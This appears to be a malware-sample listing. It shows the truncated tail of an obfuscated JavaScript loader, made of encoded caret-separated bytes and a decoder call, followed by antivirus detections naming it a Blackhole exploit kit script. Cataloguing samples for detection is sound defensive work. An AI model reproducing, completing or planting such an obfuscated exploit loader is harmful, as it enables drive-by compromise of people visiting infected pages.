... 3824 bytes are skipped ...^b5^73^67^ac^b5^ab^67^70^67^70^82^54^51^c4^54^51^b0^ad^67^6f^b5^a8^bd^b0^ae^a8^bb^b6^b9^75^aa^b6^b6^b2^b0^ac^8c^b5^a8^a9^b3^ac^ab^70^54^51^c2^54^51^b0^ad^6f^8e^ac^bb^8a^b6^b6^b2^b0^ac^6f^6e^bd^b0^ba^b0^bb^ac^ab^a6^bc^b8^6e^70^84^84^7c^7c^70^c2^c4^ac^b3^ba^ac^c2^9a^ac^bb^8a^b6^b6^b2^b0^ac^6f^6e^bd^b0^ba^b0^bb^ac^ab^a6^bc^b8^6e^73^67^6e^7c^7c^6e^73^67^6e^78^6e^73^67^6e^76^6e^70^82^54^51^54^51^b8^b7^ad^ae^c1^77^80^6f^70^82^54^51^c4^54^51^c4".split(olpyip);bhqsk="";brccm("arCode");mdzoiq(""+bhqsk);}Antivirus reports:- AntiVir
- JS/Blacole.NY.3
- Avast
- JS:Includer-ALK [Trj]
- Bkav
- MW.Clod55e.Trojan.63ae
- Ikarus
- JS.Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.EB
- TrendMicro-HouseCall
- TROJ_GEN.F47V1027
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.NY
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|